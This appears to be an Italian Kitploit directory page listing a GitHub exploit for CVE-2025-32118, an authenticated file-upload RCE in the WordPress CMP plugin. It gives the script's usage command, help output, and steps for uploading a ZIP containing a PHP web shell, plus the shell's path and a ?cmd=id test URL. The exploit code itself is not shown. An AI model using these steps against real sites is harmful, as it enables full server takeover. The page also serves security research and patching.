Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32118 — Plugin WordPress CMP – Coming Soon & Maintenance <= 4.1.13 - Vulnerabilità di esecuzione di codice in remoto (RCE) | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-32118
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-32118

CVE-2025-32118

Plugin WordPress CMP – Coming Soon & Maintenance <= 4.1.13 - Vulnerabilità di esecuzione di codice in remoto (RCE)

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚀 CVE-2025-32118 - Exploit RCE per il Plugin CMP di WordPress

🔍 Titolo: Plugin CMP – Coming Soon & Maintenance di WordPress <= 4.1.13 - Esecuzione di codice in remoto (RCE)
🗓️ Pubblicato: 2025-04-04
🔐 CWE: CWE-434 - Caricamento senza restrizioni di file con tipo pericoloso
📊 CVSS: 9.1 (CRITICO) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H


📜 Descrizione

Esiste una vulnerabilità critica di Esecuzione di codice in remoto (RCE) nel plugin CMP – Coming Soon & Maintenance per WordPress (<= 4.1.13).
Questa falla consente a un utente amministratore autenticato di caricare file ZIP dannosi contenenti shell PHP eseguibili, portando alla compromissione completa del sito.


💥 Impatto

  • Caricamento di codice PHP arbitrario nella directory del plugin
  • Esecuzione senza restrizioni di comandi di sistema tramite web shell
  • Potenziale acquisizione totale del server

⚙️ Requisiti

  • Sito WordPress con plugin CMP vulnerabile installato (<= 4.1.13)
  • Credenziali valide di amministratore WordPress (Autenticazione richiesta)

💻 Utilizzo

root@kitploit:~
python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password

✍️ Utilizzo (Output di help della CLI)

root@kitploit:~
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME   Admin username
  -p, --password PASSWORD    Admin password

📌 Argomenti:

FlagDescription
-uURL di base del sito WordPress
-unusername
-ppassword

🧪 Cosa fa:

  1. Autentica al pannello di amministrazione di WordPress.
  2. Recupera un nonce valido per la richiesta di upload.
  3. Crea uno ZIP malevolo con:
    • style.css (formato tema valido)
    • nxploitedshell.php (payload RCE)
  4. Carica lo ZIP utilizzando la funzionalità vulnerabile di upload dei temi.
  5. Verifica la shell eseguendo ?cmd=whoami.

📂 Posizione della Shell

Una volta caricata con successo, la shell si troverà in:

root@kitploit:~
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php

Provala tramite:

root@kitploit:~
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id

❗ Disclaimer

Questo exploit è solo a scopo educativo.
L'uso non autorizzato di questo codice contro sistemi che non possiedi è illegale e non etico.


🔗 Riferimenti

  • CVE-2025-32118 su MITRE
  • CWE-434: https://cwe.mitre.org/data/definitions/434.html

✒️ Autore:

Nxploited | Khaled Alenazi

Scarica lo strumento